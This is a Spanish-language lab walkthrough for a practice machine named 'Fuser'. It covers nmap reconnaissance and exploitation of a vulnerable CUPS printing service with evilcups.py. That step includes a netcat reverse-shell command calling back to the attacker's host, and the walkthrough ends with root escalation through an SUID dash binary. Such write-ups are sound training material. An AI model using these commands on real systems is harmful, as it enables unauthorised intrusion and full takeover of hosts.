# Fuser

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.129
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F2ertYk7mbCPVoXR8uVid%2Fimage.png?alt=media&#x26;token=fbb239c8-151a-447b-b2ef-ba3ff360722e" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.129 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FSvMfJzieu9rDVlMNLYRO%2Fimage.png?alt=media&#x26;token=4295470f-7803-4ca4-ad00-da80a55bcbb7" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 631** perteneciente al **servicio IPP** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,631 -v 192.168.1.129
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F4riAXgdTegZlDsH7xksn%2Fimage.png?alt=media&#x26;token=5bec81cd-dac1-43d0-9fd4-b54f2782fb7b" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 80. No contiene nada relevante.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FtwSo4j0ycEB1QBmFkS7j%2Fimage.png?alt=media&#x26;token=3c7576b3-7c2a-4864-92fd-badf002c27c9" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Revisamos el puerto 631. Descubrimos que es un **CUPS** y su versión es vulnerable en la que podemos hacer una **Reverse Shell**.

{% @github-files/github-code-block url="<https://github.com/IppSec/evil-cups/blob/main/evilcups.py>" %}

Ejecutamos y nos ponemos en escucha.

```bash
nc -nlvp 443
python3 evilcups.py 192.168.1.56 192.168.1.129 "nc 192.168.1.56 443 -e /bin/sh"
```

Buscamos directorios.

```bash
gobuster dir -u http://192.168.1.129:631 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

Vemos que hay un directorio llamado **/printers** por lo que ahí se verá las impresoras.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FMiyG4RM7FXXVGENd6ChI%2Fimage.png?alt=media&#x26;token=2f3ca1c0-c980-4561-9a1a-f2e0f9806456" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FsZM5PfI6jitbyTTU6T7w%2Fimage.png?alt=media&#x26;token=15a45c9e-766a-4ca3-841c-1731a7ad7fac" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FOHvDZPPGxQlCjkJDdECN%2Fimage.png?alt=media&#x26;token=c3f20782-880f-4ad5-86cc-9eb11e98eac0" alt=""><figcaption></figcaption></figure>

Obtenermos ya la shell.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fm92oVx6j3PFEeykgoo7G%2Fimage.png?alt=media&#x26;token=f818a5cd-f7e5-4740-9036-4b7804ff08ba" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos SUDO.&#x20;

Tenemos permisos **SUID** sobre el binario **dash**.

{% embed url="<https://gtfobins.github.io/gtfobins/dash/#suid>" %}

```bash
/usr/bin/dash -p
```

Ya somos **root**.
